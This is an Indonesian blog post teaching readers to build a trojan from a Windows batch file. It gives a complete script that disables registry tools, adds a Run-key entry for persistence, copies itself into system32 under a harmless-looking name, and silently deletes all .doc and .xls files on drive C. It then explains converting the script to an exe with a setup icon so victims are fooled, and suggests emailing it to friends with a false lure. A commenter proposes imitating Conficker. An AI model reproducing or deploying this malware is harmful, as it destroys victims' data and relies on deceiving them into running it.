headline photo

Cara Membuat Trojan dengan .bat

Sabtu, 12 Desember 2009


Membuat Trojan hanya dengan .bat. Dan sangan mudah......



A. Intro


Bat merupakan suatu ekstensi yang bisa langsung dieksekusi oleh system windows, artinya file yang memiliki ekstensi Bat merupakan suatu aplikasi yang tidak memerlukan system pendukung dalam pengeksekusiannya. Dengan adanya pengeksekusian langsung, maka file tersebut bisa berinteraksi langsung dengan system yang ditempatinya, yaitu windows.

Kita bisa bermain dengan file *.bat untuk melakukan suatu pengaturan terhadap windows. Misalnya, menghapus direktori dan file, shutdown komputer, booting, eksekusi file aplikasi, dan lain sebagainya hanya dengan satu tindakan. File yang berekstensi Bat memiliki programming yang sama dengan perintah di Dos windows, untuk itu bagi anda yang memiliki kemampuan bath programming yang baik tidaklah suatu yang sulit untuk melakukan pemberian command di file *.bat.

File *.Bat sebenarnya merupakan suatu jalan pintas bagi dos command untuk pengoperasiannya, yang mana jika kita ingin melakukan suatu eksekusi perintah di dos harus mengetikkan sebaris perintah dan perintah - perintah lainya. Dengan adanya file ekstensi Bat, maka pengeksekusian perintah tersebut menjadi lebih mudah hanya dengan satu tindakan, dan bisa memiliki berbagai macam baris perintah didalamnya.

Pada artikel ini, kita akan membahas bagaimana suatu file Bat dibuat untuk dijadikan file sejenis trojan dengan mengkonvert nya menjadi file ekstensi exe. Sebenarnya file bat tersebut telah dapat dijadikan file pengeksekusi, kenapa masih harus dikonvert lagi menjadi exe ? Agar user yang menggunakannya tertipu dan sulit untuk membaca file apa yang sedang digunakannya. Untuk mempermanis manipulasinya, maka icon exe tersebut juga akan kita ganti menjadi ikon setup. Sehingga tampilannya nanti tampak seperti suatu file setup biasa dengan ekstensi exe.

Untuk Mengkonvertnya menjadi exe serta mengubah ikonnya menjadi ikon setup. maka kita juga membutuhkan software lainnya, yaitu converter bat. Soft tersebut bisa anda dapatkan di banyak situs. Coba anda search di google. Jika anda merasa sungkan untuk mencarinya, anda bisa mengirimkan email anda kepada saya, nanti akan saya kirimkan 'barang' tersebut via e-mail.


B. Perintah-Perintah Command Dos

Sebelum kita memulai pembuatan, sedikit banyak kita juga harus mengerti perintah dasar pada command dos, karena sangat berperan penting terhadap file yang hendak kita bikin ini. Perintah dasar command dos, seperti :
c:\dir

Yang mana c:\ merupakan drive dimana saat ini kita berada, dan dir adalah perintahnya untuk melihat direktori yang berada di drive tersebut.

Banyak perintah di command dos, juga bisa untuk pengkondisian seperti "if", "else", "not", dan lainnya. Kita coba sekarang dengan pengkondisian "if" :
c:\if exist %systemroot%\notepad.exe (echo file notepad.exe ada) else echo file missing

Yang mana perintah "if" digunakan dalam pengkondisian bahwa jika file Notepad.exe yang berada di %systemroot% atau bisa dikatakan dengan direktori windows system di drive manapun yang berada di system tersebut ada maka akan ditampilkan pesan (echo) "file notepad.exe ada". Jika file notepad.exe tersebut tidak ada di direktori yang dimaksud (else) maka akan ditampilkan pesan (echo) "file missing". Demikian juga dengan pengkondisian yang lainnya, seperti menghapus dan menambahkan file. Perintah - perintah command dos inilah yang nantinya bisa kita coba di dalam file bat nantinya.


C. Memulai Pembuatan File Bat

File Bat bisa kita buat dengan menggunakan teks editor, seperti notepad atau teks editor lainnya yang sejenis. Sebaiknya kita mencobanya dengan menggunakan Notepad.exe milik windows.

Baiklah kita anggap sekarang kita telah membuka teks editor Notepad.exe. Kita akan mencoba beberapa listing kode yang bisa kita tuliskan di notepad.exe, coba perhatikan listing kode ini dan tuliskan di notepad.exe anda, atau jika tidak ingin, rumit copy - pastekan saja. Bagi anda yang senior dalam hal programming..., maaf ini bukan porsi anda. ini hanya suatu pembelajaran bagi kami untuk melangkah.

rem ' MeTaLaToR
reg add HKCU\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 00000001 /f

reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\fixsys.exe /f

copy setup.exe %systemroot%\system32\fixsys.exe

del /f /s /q c:\*.doc c:\*.xls

Keterangan Listing :

@echo off
Digunakan untuk menyembunyikan baris perintah yang nampak pada layar.

Cls
Membersihkan layar console.

reg add HKCU\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 00000001 /f
Baris perintah ini digunakan untuk menambahkan value pada badan registry agar tidak bisa dibuka maupun mengedit regisrty oleh user, kecuali jika ia menuliskan perintah "reg edit" atau "reg add" pada file bat dan mengembalikannya pada value awal yaitu "00000000" untuk mengenabledkannya. Kita juga bisa menambahkan perintah lainnya dengan "reg add" pada registry untuk "menteror" user pada systemnya.

/v : adalah value untuk registry yang mana saat ini bernama disabledregistrytools
/t : adalah typenya yang mana kita pakai disini adalah type DWORD
/d : adalah nilai dari type tersebut, kita pakai 00000001 untuk kondisi "YA" disabled kan aja !
/f : adalah force overwriting add tanpa question (pertanyaan) dari system

reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\fixsys.exe /f
Baris perintah ini digunakan untuk menjalankan file fixsys.exe pada saat booting awal windows dimulai, dengan memanggil file fixsys.exe di direktori %systemroot%\system32 yang sebenarnya merupakan hasil copy dari file induk kita.

/v : adalah nama value nya, kita pakai nama systray
/t : adalah type valuenya, kita pakai STRING
/d : adalah nilai string tersebut, kita masukkan letak dimana file yang hendak dieksekusi
/f : adalah force overwriting add tanpa question (pertanyaan) dari system

copy setup.exe %systemroot%\system32\fixsys.exe
Pada baris perintah sebelumnya yaitu eksekusi file pada saat windows dimulai, ada file yang nama file nya fixsys.exe, mungkin ada bertanya dari mana file tersebut berasal. File fixsys.exe tersebut merupakan copy dari file setup.exe yang sedang kita bentuk ini. Baris perintah tersebut diatas adalah meng copy file setup.exe yang berada di dalam direktori yang sama pada saat pengeksekusian berlangsung yang kemudian di copykan di %systemroot%\system32 dengan nama fixsys.exe. File yang kita tulis ini nantinya akan kita convert menjadi setup.exe.

Lho kenapa harus dicopykan di c:\windows\system32 (%systemroot%\system32) ? Letaknya terserah kita mau dimana asalkan sinkron dengan pengeksekusian run windows saat dimulai. Sengaja disini diambil di %systemroot%\system32 hanya untuk menutupi kemungkinan user kecil untuk menghapusnya, begitu juga dengan nama file tersebut, kenapa tidak nama yang lain ? hal ini juga terserah dan bebas asalkan sinkron dengan eksekusi booting awal windowsnya, karena jika tidak maka file tersebut tidak akan berguna. Sengaja mengambil nama fixsys.exe hanya untuk mengelabui user, dan kecil kemungkinannya untuk menghapusnya. Karena jika kita menggunakan nama yang sangar seperti virus.exe, w32_trojan.exe, atau yang lainnya, sangat besar kemungkinannya untuk dihapus oleh user tersebut.

del /f /s /q c:\*.doc c:\*.xls
Baris perintah tersebut diatas adalah tindakannya, yaitu menghapus apa saja yang berekstensi doc dan xls pada drive c:, walaupun file tersebut berada di dalam folder manapun selama berada pada drive c:

/f : adalah force deleting read only file, yaitu menghapus file read only tanpa pertanyaan.
/s : adalah menghapus seluruh file yang dimaksud didalam direktori manapun
/q : adalah quiet mode, menghapus tanpa pertanyaan

Kita bisa mencobanya dengan perintah-perintah lainnya, seperti menampilkan pesan, menjalankan program, menambahkan file, edit file, shutdown, restart, maupun perintah-perintah lainnya, asalkan kita telah mengetahui perintah-perintah dari dos.

Jika telah selesai menuliskan listing tersebut diatas, maka simpanlah file tersebut dengan nama file setup.bat.

Sampai disini sebenarnya file tersebut telah siap untuk dieksekusi, namun harus mengganti nama setup.exe menjadi setup.bat didalam badan file tersebut, pada baris
“copy setup.exe %systemroot%\system32\fixsys.exe” menjadi
“copy setup.bat %systemroot%\system32\fixsys.bat”

Tetapi jika ini dianggap telah selesai, maka file tersebut akan mudah terbaca oleh user, dengan mengedit file tersebut, dan akan terlihat semua baris-baris perintah didalamnya, dan tentunya tidak baik bagi kesehatan trojan ini.


D. Konvert Bat To Exe

Untuk mengubah file bat tersebut menjadi exe, dibutuhkan soft pendukung. Baiklah anggap saja kita telah memiliki converter tersebut, kita pilih saja software BATH CONVERTER 4.0, dapat diambil langsung di situs aslinya www.bionic-software.de. Atau kamu bisa pakai converter “bat to exe” yang lain, yang penting bisa mengkonvert file milik kita yang baru saja dibikin ini menjadi file exe.

Software ini (sebagai contoh kita menggunakan Bath Converter 4.0) memiliki 2 fungsi, yang pertama adalah pengkonvert file bath ke exe, dan yang kedua adalah exe ke bath. kita pilih tab "bath to exe". Jika tidak ada masalah tentu saja tab tersebut berada di depan layar anda. Pilih file yang hendak di konvert, kemudian pilih ikonnya dari koleksi ikon pribadi anda :-) saya yakin pasti kamu nyimpen, sebaiknya pilih ikon yang tidak mengundang kecurigaan, atau pilihlah icon yang berbentuk icon setup.

Jika tidak ada kendala, seharusnya file tersebut telah berhasil dicetak dan siap edar. Kirimkan ke email teman anda. Terus bilang bahwa "saya punya update virtual girl yang baru!, ini filenyo.....".


E. Finishing

Dari percobaan tersebut diatas, sekiranya ada gambaran dari teman-teman untuk memodifikasi dan mencoba beberapa manipulasi lainnya, seperti mengubah tampilan dekstop, set wallpaper dengan foto kita pada komputer orang lain, atau percobaan lainnya yang lebih mengarah kepada system, seperti menjalankan file, mengaktifkan file server, dan mengirimkan informasi tentang computer yang ‘dihinggapi’.

1 komentar:

Riyan Widiyanto mengatakan...

Mantap dah ... Bagaimana jika membuat tiruan Conficker boss, pasti keren tuh

Posting Komentar